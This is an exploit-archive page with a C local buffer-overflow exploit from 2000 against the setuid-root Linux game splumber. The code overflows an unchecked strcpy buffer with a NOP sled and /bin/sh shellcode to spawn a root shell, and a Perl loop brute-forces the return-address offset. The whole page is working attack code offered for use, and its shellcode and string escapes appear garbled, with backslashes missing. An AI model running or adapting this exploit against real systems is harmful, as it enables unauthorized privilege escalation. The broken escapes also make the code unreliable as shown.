[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : xsplumber - strcpy() buffer overflow
# Published : 2000-11-17
# Author : vade79
# Previous Title : HP-UX 11.0 pppd Stack Buffer Overflow Exploit
# Next Title : Oracle (oidldapd connect) Local Command Line Overflow Exploit
/*
(linux)splumber[version2] buffer overflow, by v9[v9@fakehalo.org]. this is
a misc. exploit for the linux-SVGAlib space plumber game. which, as you
know needs to be installed setuid root. this overflow is due to a simple
oversight in the command line parser. uses strcpy() to copy to an unchecked
250 byte buffer.
note: i also noticed, other than just being setuid root in the makefile, it
sets splumber's permissions to 4777. *g*
...and here is the perl script for the lazy person:
#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "using offset: $i.n";
system("./xsplumber $i");
$i+=50;
}
*/
#define PATH "/usr/games/splumber" // change to the correct path.
#define BUFFER_SIZE 257 // don't change.
#define DEFAULT_OFFSET -300 // worked for me.
static char exec[]=
"xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0fxb8x1bx56"
"x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80"
"xe8xd7xffxffxffx2fx62x69x6ex2fx73x68x01"; // still like it.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[BUFFER_SIZE];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
printf("*** (linux)splumber[version2] local buffer overflow, by v9[v9@fakehalo.org].n");
printf("*** return address: 0x%lx, offset: %d.n",ret,offset);
for(i=0;i<(252-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
*(long *)&bof[i+strlen(exec)]=ret; // perfect, not lazy for once.
bof[BUFFER_SIZE-1]=0;
if(execlp(PATH,"splumber",bof,0)){
printf("error: program did not execute properly, check the path.n");
exit(0);
}
}
# www.Syue.com [2000-11-17]